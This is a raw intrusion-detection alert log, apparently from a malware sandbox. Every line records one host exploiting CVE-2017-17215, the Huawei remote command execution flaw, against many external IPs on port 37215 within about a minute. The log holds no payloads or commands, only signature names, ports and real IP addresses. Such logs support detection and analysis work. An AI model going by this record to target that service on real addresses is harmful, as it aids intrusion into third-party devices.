                                                        06/13/24-21:32:23.834227TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5348237215192.168.2.14156.232.7.149
                                                        06/13/24-21:32:01.239703TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3790837215192.168.2.14156.60.152.170
                                                        06/13/24-21:32:11.508725TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3892637215192.168.2.14197.54.57.78
                                                        06/13/24-21:33:09.113754TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5501637215192.168.2.14197.7.31.225
                                                        06/13/24-21:32:36.265460TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4608637215192.168.2.14197.170.157.74
                                                        06/13/24-21:32:23.836582TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4875837215192.168.2.14156.24.174.37
                                                        06/13/24-21:32:40.375856TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5201637215192.168.2.14197.23.108.25
                                                        06/13/24-21:32:38.323290TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4346037215192.168.2.14197.254.25.84
                                                        06/13/24-21:33:11.155380TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4585437215192.168.2.14197.115.70.158
                                                        06/13/24-21:32:13.546690TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4891637215192.168.2.14197.12.212.182
                                                        06/13/24-21:32:42.422823TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3981437215192.168.2.14156.129.159.43
                                                        06/13/24-21:32:36.246136TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4945237215192.168.2.14156.27.193.72
                                                        06/13/24-21:32:11.487998TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6051237215192.168.2.1441.38.49.90
                                                        06/13/24-21:32:56.783734TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3970237215192.168.2.1441.62.88.234
                                                        06/13/24-21:32:44.450412TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5410837215192.168.2.14197.96.205.37
                                                        06/13/24-21:32:44.454866TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5152637215192.168.2.14156.33.186.245
                                                        06/13/24-21:32:13.546396TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5918837215192.168.2.14197.163.243.137
                                                        06/13/24-21:32:21.785203TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4778237215192.168.2.14197.164.235.161
                                                        06/13/24-21:32:46.504046TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4681837215192.168.2.14197.238.181.2
                                                        06/13/24-21:33:09.087457TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3443237215192.168.2.1441.174.37.178
                                                        06/13/24-21:32:17.694235TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3875637215192.168.2.1441.208.79.15
                                                        06/13/24-21:31:57.134360TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4440037215192.168.2.1441.202.41.223
                                                        06/13/24-21:33:09.088529TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3710637215192.168.2.14156.183.97.124
                                                        06/13/24-21:32:44.457360TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6029837215192.168.2.1441.120.27.82
                                                        06/13/24-21:32:40.373188TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4448437215192.168.2.14156.206.57.70
                                                        06/13/24-21:33:17.308540TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5364637215192.168.2.1441.118.128.113
                                                        06/13/24-21:32:25.996979TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4284437215192.168.2.14197.188.88.189
                                                        06/13/24-21:32:30.119458TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4410037215192.168.2.1441.34.78.85
                                                        06/13/24-21:32:30.096503TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5032237215192.168.2.14156.163.120.239
                                                        06/13/24-21:32:17.696932TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4864837215192.168.2.1441.133.251.251
                                                        06/13/24-21:32:21.805577TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4525237215192.168.2.14156.177.236.2
                                                        06/13/24-21:33:11.181582TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3776037215192.168.2.14197.115.133.192
                                                        06/13/24-21:33:11.161069TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5134037215192.168.2.14197.189.129.193
                                                        06/13/24-21:32:34.216973TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5245637215192.168.2.14156.120.130.129
                                                        06/13/24-21:32:15.611302TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4249237215192.168.2.14197.17.69.27
                                                        06/13/24-21:31:57.131657TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5727437215192.168.2.14156.251.146.104
                                                        06/13/24-21:32:36.246483TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3888237215192.168.2.14197.188.134.8
                                                        06/13/24-21:32:21.784700TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3292037215192.168.2.14156.223.228.72
                                                        06/13/24-21:32:58.842196TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3542037215192.168.2.14197.243.6.74
                                                        06/13/24-21:33:11.178809TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4791837215192.168.2.14156.245.120.213
                                                        06/13/24-21:32:07.420249TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5434837215192.168.2.14156.93.190.196
                                                        06/13/24-21:32:34.199761TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5518437215192.168.2.1441.31.167.128
                                                        06/13/24-21:33:09.129975TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5205437215192.168.2.1441.191.99.121
                                                        06/13/24-21:31:57.134307TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4973437215192.168.2.14156.150.155.115
                                                        06/13/24-21:32:09.438654TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4447237215192.168.2.1441.226.82.82
                                                        06/13/24-21:33:11.155093TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4579237215192.168.2.14197.111.162.247
                                                        06/13/24-21:32:15.629879TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4503437215192.168.2.14156.193.115.203
                                                        06/13/24-21:32:54.709012TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5875237215192.168.2.14197.248.229.172
                                                        06/13/24-21:32:13.570448TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4478237215192.168.2.14156.190.223.5
                                                        06/13/24-21:31:59.196222TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5092437215192.168.2.1441.167.6.76
                                                        06/13/24-21:32:50.610329TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4997837215192.168.2.14156.186.159.13
                                                        06/13/24-21:32:44.454551TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4232837215192.168.2.1441.23.55.161
                                                        06/13/24-21:32:36.246053TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5184637215192.168.2.14156.238.188.223
                                                        06/13/24-21:32:48.567455TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4665837215192.168.2.14197.242.46.200
                                                        06/13/24-21:32:25.978293TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5131637215192.168.2.1441.45.30.150
                                                        06/13/24-21:32:03.278545TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4365437215192.168.2.14197.194.155.30
                                                        06/13/24-21:32:52.679141TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4099237215192.168.2.14156.201.170.78
                                                        06/13/24-21:32:09.439888TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4179037215192.168.2.14197.58.218.218
                                                        06/13/24-21:32:38.297210TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4580837215192.168.2.14156.177.185.65
                                                        06/13/24-21:33:17.310092TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5608837215192.168.2.1441.153.187.30
                                                        06/13/24-21:32:52.670697TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3338837215192.168.2.1441.130.175.4
                                                        06/13/24-21:32:40.359713TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5116837215192.168.2.14197.177.101.170
                                                        06/13/24-21:32:44.453425TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5610237215192.168.2.14197.63.25.218
                                                        06/13/24-21:32:58.839986TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5909237215192.168.2.14197.120.85.221
                                                        06/13/24-21:32:11.487511TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4524237215192.168.2.14197.143.219.190
                                                        06/13/24-21:32:28.026084TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4643237215192.168.2.1441.185.142.87
                                                        06/13/24-21:32:11.489078TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3778237215192.168.2.1441.43.28.22
                                                        06/13/24-21:33:04.989249TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5473437215192.168.2.1441.18.90.214
                                                        06/13/24-21:32:44.478623TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3621437215192.168.2.14156.70.120.35
                                                        06/13/24-21:33:15.274349TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5285237215192.168.2.14156.221.234.12
                                                        06/13/24-21:32:17.670934TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5172237215192.168.2.1441.162.28.40
                                                        06/13/24-21:32:17.694647TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3919837215192.168.2.14197.128.127.65
                                                        06/13/24-21:32:34.192193TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5527237215192.168.2.1441.60.183.213
                                                        06/13/24-21:33:05.016881TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3292037215192.168.2.14197.129.172.130
                                                        06/13/24-21:32:15.607185TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3721837215192.168.2.14197.89.109.212
                                                        06/13/24-21:33:09.085772TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4894237215192.168.2.14197.134.210.171
                                                        06/13/24-21:33:05.016552TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5133037215192.168.2.14197.206.243.112
                                                        06/13/24-21:33:15.274313TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5193037215192.168.2.1441.210.194.82
                                                        06/13/24-21:32:23.834264TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5966637215192.168.2.1441.133.122.188
                                                        06/13/24-21:32:17.697080TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3930437215192.168.2.1441.177.236.128
                                                        06/13/24-21:33:09.130362TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4037237215192.168.2.14197.22.76.174
                                                        06/13/24-21:32:01.224234TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3373637215192.168.2.14156.104.179.121
                                                        06/13/24-21:32:21.805615TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4686037215192.168.2.14197.103.71.104
                                                        06/13/24-21:32:54.710352TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5363237215192.168.2.1441.25.152.57
                                                        06/13/24-21:33:13.212891TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4235237215192.168.2.1441.136.81.195
                                                        06/13/24-21:32:46.525473TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5355037215192.168.2.14197.244.187.104
                                                        06/13/24-21:32:32.153978TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6025037215192.168.2.14156.199.137.69
                                                        06/13/24-21:32:23.945880TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5470637215192.168.2.1441.16.74.47
                                                        06/13/24-21:31:57.136252TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3317837215192.168.2.14156.195.180.29
                                                        06/13/24-21:32:19.731833TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4874637215192.168.2.1441.225.182.137
                                                        06/13/24-21:32:32.166423TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4438437215192.168.2.14197.151.26.37
                                                        06/13/24-21:32:28.023936TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3995037215192.168.2.14197.220.164.116
                                                        06/13/24-21:33:15.252329TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6081837215192.168.2.1441.187.59.228
                                                        06/13/24-21:33:09.088773TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5882437215192.168.2.14156.134.5.202
                                                        06/13/24-21:32:56.786022TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4992637215192.168.2.14197.135.159.211
                                                        06/13/24-21:32:52.660489TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4664237215192.168.2.14156.174.199.53
                                                        06/13/24-21:33:02.937454TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4378837215192.168.2.14156.10.146.56
                                                        06/13/24-21:32:01.220335TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3578637215192.168.2.14197.106.84.205
                                                        06/13/24-21:32:01.224988TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3538037215192.168.2.14156.250.165.250
                                                        06/13/24-21:32:54.708520TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5812637215192.168.2.14156.208.76.84
                                                        06/13/24-21:32:05.349711TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5715037215192.168.2.14156.203.73.102
                                                        06/13/24-21:32:32.164830TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4049837215192.168.2.1441.101.241.119
                                                        06/13/24-21:32:03.307618TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4641237215192.168.2.14197.34.140.212
                                                        06/13/24-21:32:23.941905TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3617237215192.168.2.14197.94.58.122
                                                        06/13/24-21:32:17.694091TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3957637215192.168.2.14197.27.180.15
                                                        06/13/24-21:32:48.551376TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5401637215192.168.2.1441.212.73.48
                                                        06/13/24-21:32:03.279880TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5129237215192.168.2.1441.3.16.29
                                                        06/13/24-21:32:32.152790TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4558637215192.168.2.1441.106.9.226
                                                        06/13/24-21:32:42.405415TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4945037215192.168.2.14156.190.203.253
                                                        06/13/24-21:32:56.757759TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4178237215192.168.2.1441.166.247.50
                                                        06/13/24-21:32:40.359002TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3574237215192.168.2.1441.253.43.166
                                                        06/13/24-21:32:30.075848TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5425437215192.168.2.1441.50.17.82
                                                        06/13/24-21:32:03.278695TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3390037215192.168.2.1441.38.56.45
                                                        06/13/24-21:33:09.089622TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5488837215192.168.2.1441.125.140.120
                                                        06/13/24-21:32:34.199858TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6004437215192.168.2.14197.27.72.39
                                                        06/13/24-21:32:40.375145TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5899637215192.168.2.14156.80.2.172
                                                        06/13/24-21:32:50.613664TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5864837215192.168.2.14197.178.222.61
                                                        06/13/24-21:32:36.264526TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3982037215192.168.2.14197.74.6.212
                                                        06/13/24-21:33:05.013793TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4947437215192.168.2.14156.112.196.140
                                                        06/13/24-21:31:57.138064TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5206037215192.168.2.14156.233.114.165
                                                        06/13/24-21:32:01.222316TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5452637215192.168.2.1441.41.135.181
                                                        06/13/24-21:32:42.404609TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3704837215192.168.2.14197.94.119.137
                                                        06/13/24-21:32:52.672139TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5178437215192.168.2.14156.255.77.194
                                                        06/13/24-21:33:09.089206TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3983637215192.168.2.1441.132.20.106
                                                        06/13/24-21:32:09.458282TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5199437215192.168.2.14156.40.134.223
                                                        06/13/24-21:32:21.801328TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4314437215192.168.2.14156.66.202.114
                                                        06/13/24-21:32:21.800071TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5379037215192.168.2.14156.13.122.116
                                                        06/13/24-21:32:38.322475TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4045237215192.168.2.14156.28.189.174
                                                        06/13/24-21:32:03.300265TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3753637215192.168.2.14197.0.87.171
                                                        06/13/24-21:32:09.438567TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3456237215192.168.2.14197.229.237.19
                                                        06/13/24-21:32:32.152232TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3339037215192.168.2.1441.217.15.129
                                                        06/13/24-21:32:40.355429TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4722637215192.168.2.14156.153.26.147
                                                        06/13/24-21:33:11.177908TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5390837215192.168.2.14156.177.148.112
                                                        06/13/24-21:32:21.801370TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3561437215192.168.2.1441.186.29.196
                                                        06/13/24-21:33:00.885110TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5853837215192.168.2.14197.222.187.113
                                                        06/13/24-21:33:17.309404TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3578437215192.168.2.14197.163.182.61
                                                        06/13/24-21:32:05.370581TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4732037215192.168.2.14156.202.156.38
                                                        06/13/24-21:32:01.221418TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3729437215192.168.2.14197.99.68.176
                                                        06/13/24-21:32:52.659174TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4441437215192.168.2.14156.11.239.82
                                                        06/13/24-21:32:11.487735TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4600637215192.168.2.14156.75.167.61
                                                        06/13/24-21:31:59.194570TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3356637215192.168.2.14156.10.114.158
                                                        06/13/24-21:32:05.378225TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5041437215192.168.2.1441.96.210.19
                                                        06/13/24-21:32:05.377892TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4353037215192.168.2.14197.43.169.105
                                                        06/13/24-21:33:07.059631TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3998237215192.168.2.14156.200.188.196
                                                        06/13/24-21:32:48.568251TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3475437215192.168.2.14156.168.23.194
                                                        06/13/24-21:32:23.943710TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4504237215192.168.2.1441.76.188.83
                                                        06/13/24-21:31:57.153501TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5239437215192.168.2.14197.219.108.12
                                                        06/13/24-21:32:15.610322TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6050837215192.168.2.14197.5.221.125
                                                        06/13/24-21:32:01.222193TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5245237215192.168.2.1441.206.185.161
                                                        06/13/24-21:31:59.196505TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3541637215192.168.2.1441.140.121.217
                                                        06/13/24-21:32:48.550905TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5418637215192.168.2.1441.193.197.163
                                                        06/13/24-21:33:15.271543TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5995637215192.168.2.14156.45.71.20
                                                        06/13/24-21:33:07.039946TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4734037215192.168.2.14156.198.112.135
                                                        06/13/24-21:32:56.759199TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4608037215192.168.2.14156.112.13.27
                                                        06/13/24-21:32:52.660278TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4913237215192.168.2.14197.72.88.208
                                                        06/13/24-21:33:00.885352TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3742437215192.168.2.14197.170.136.254
                                                        06/13/24-21:32:38.317468TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5658237215192.168.2.14156.253.122.243
                                                        06/13/24-21:32:40.377649TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4352437215192.168.2.14197.245.214.102
                                                        06/13/24-21:33:15.257375TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4617837215192.168.2.1441.117.168.27
                                                        06/13/24-21:32:42.402872TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5553437215192.168.2.1441.82.59.201
                                                        06/13/24-21:32:42.407492TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5067837215192.168.2.14156.154.88.225
                                                        06/13/24-21:32:48.569132TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3907637215192.168.2.14156.59.29.176
                                                        06/13/24-21:32:21.787469TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4912637215192.168.2.1441.117.9.105
                                                        06/13/24-21:32:52.656106TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3675237215192.168.2.14156.50.134.92
                                                        06/13/24-21:33:02.914612TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3824437215192.168.2.14156.98.114.151
                                                        06/13/24-21:33:04.993978TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4351837215192.168.2.14197.221.25.35
                                                        06/13/24-21:32:54.709831TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4279437215192.168.2.1441.232.44.35
                                                        06/13/24-21:33:04.992187TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4962837215192.168.2.1441.54.249.130
                                                        06/13/24-21:33:09.128868TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4325037215192.168.2.1441.34.41.128
                                                        06/13/24-21:32:32.164385TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3637637215192.168.2.14197.209.79.90
                                                        06/13/24-21:32:21.803005TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4597637215192.168.2.14197.100.220.118
                                                        06/13/24-21:32:09.437257TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3847037215192.168.2.1441.53.164.196
                                                        06/13/24-21:32:46.527808TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5126237215192.168.2.1441.127.247.214
                                                        06/13/24-21:32:05.370747TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6060437215192.168.2.14197.53.253.35
                                                        06/13/24-21:32:28.027068TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3896237215192.168.2.14197.117.13.180
                                                        06/13/24-21:32:42.424922TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3911837215192.168.2.14156.13.87.2
                                                        06/13/24-21:33:11.156901TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4637837215192.168.2.14197.221.27.63
                                                        06/13/24-21:31:59.174039TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3369837215192.168.2.14197.111.190.191
                                                        06/13/24-21:33:04.992367TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5629237215192.168.2.14197.5.46.154
                                                        06/13/24-21:32:36.262366TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3816037215192.168.2.1441.163.45.22
                                                        06/13/24-21:33:15.274842TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3694437215192.168.2.14156.52.166.78
                                                        06/13/24-21:32:28.042951TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4414837215192.168.2.14197.33.7.64
                                                        06/13/24-21:32:44.457441TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3577237215192.168.2.14197.251.219.242
                                                        06/13/24-21:32:01.223541TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5976837215192.168.2.1441.138.70.247
                                                        06/13/24-21:33:15.257109TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4444237215192.168.2.1441.69.97.104
                                                        06/13/24-21:33:07.040557TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5771237215192.168.2.1441.175.156.69
